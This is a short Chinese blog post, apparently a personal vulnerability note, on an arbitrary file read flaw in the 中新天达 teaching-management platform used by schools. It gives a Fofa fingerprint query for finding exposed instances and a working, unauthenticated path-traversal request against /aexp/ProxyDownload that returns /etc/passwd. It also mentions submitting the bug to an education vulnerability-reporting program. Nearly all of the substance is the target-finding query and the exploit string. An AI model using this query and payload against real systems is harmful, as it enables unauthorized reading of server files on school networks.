中新天达系统存在任意文件读取漏洞 – 米饭のblog！！

AXIOM-米饭

时常陷入精神内耗（

中新天达系统存在任意文件读取漏洞

2025-6-15 4:07

|

164

|

0

|

攻防

|

2025-6-15 4:07

189 字

|

1 分钟内

//相关敏感信息已经经过脱敏处理

之前学到的一个洞，整理一下笔记，学校的实践教学管理平台可能会用这个

指纹

Fofa**:body=”aexp/ValidateImage”**

只能测绘到公网资产，很多学校的这些系统都是开放在内网，需要vpn的

但是这个漏洞利用不需要登录到管理平台的账户，在登录框页面就可以直接打

页面截图：

POC/EXP

/aexp/ProxyDownload?path=/speedec/webapps/webftp/../../../../etc/passwd

复现示例如下图：

返回了 /etc/passwd 的内容，验证漏洞存在且成功利用

src收录情况

交了一个 edu 的收录了，中危

Web 漏洞复现

暂无评论

发送评论编辑评论

Markdown

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!